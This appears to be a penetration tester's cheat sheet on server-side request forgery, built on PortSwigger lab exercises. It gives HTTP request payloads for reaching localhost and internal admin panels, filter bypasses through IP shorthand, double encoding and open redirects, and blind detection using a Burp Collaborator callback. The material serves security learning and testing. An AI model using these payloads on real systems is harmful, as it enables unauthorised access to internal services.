Server-Side Request Forgery (SSRF)

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.

• PortSwigger – SSRF
• Evasion techniques
• SVG SSRFs and saga of bypasses
• Cloud SSRF (HackTricks)

💡 See labs WebSecurityAcademy (PortSwigger) – Server-side request forgery (SSRF).

💡 See Bypassing URL/Domain/IP Formats.

Testing SSRF

Basic SSRF

POST /product/stock HTTP/1.0
...

stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1

Accessing localhost

POST /product/stock HTTP/1.1
...

stockApi=http://localhost/admin

Accessing another back-end system

Send the request to the Intruder module and make the IP address the varying part to scan the network for port 8080.

POST /product/stock HTTP/1.1
...

stockApi=http://<PRIVATE IP>:8080

SSRF with blacklist-based input filter

Example from the labs WebSecurityAcademy (PortSwigger) – Server-side request forgery (SSRF), use 127.1 to bypass filter on localhost, use double URL encoding (use Hackvertor) to bypass restriction on “admin”.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2F127.1/<@replace('%','%25')><@urlencode_all>admin/<@/urlencode_all><@/replace>

SSRF with filter bypass via open redirection vulnerability

Example: if you find an Open Redirect vulnerability, use it to access internal admin interface with the SSRF.

POST /product/stock HTTP/1.1
...

stockApi=<@urlencode>/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin<@/urlencode>

Blind SSRF with out-of-band detection

Try injecting the Burp Collaborator URL in the Referer HTTP header value. Check in the Burp Collaborator if a request is received.

Referer: https://<BURP COLLABORATOR ID>.oastify.com/

💡 See lab Blind SSRF with Shellshock exploitation.

• Install the Collaborator Everywhere extension for Burp Suite.
• Add the target to Burp Suite’s target scope, so that Collaborator Everywhere will target it.
• Navigate the webapp.
• In the Target tab, new issues will be create for the vulnerable URL, for example:
  • Collaborator Pingback (HTTP): Referer
  • Collaborator Pingback (HTTP): User-Agent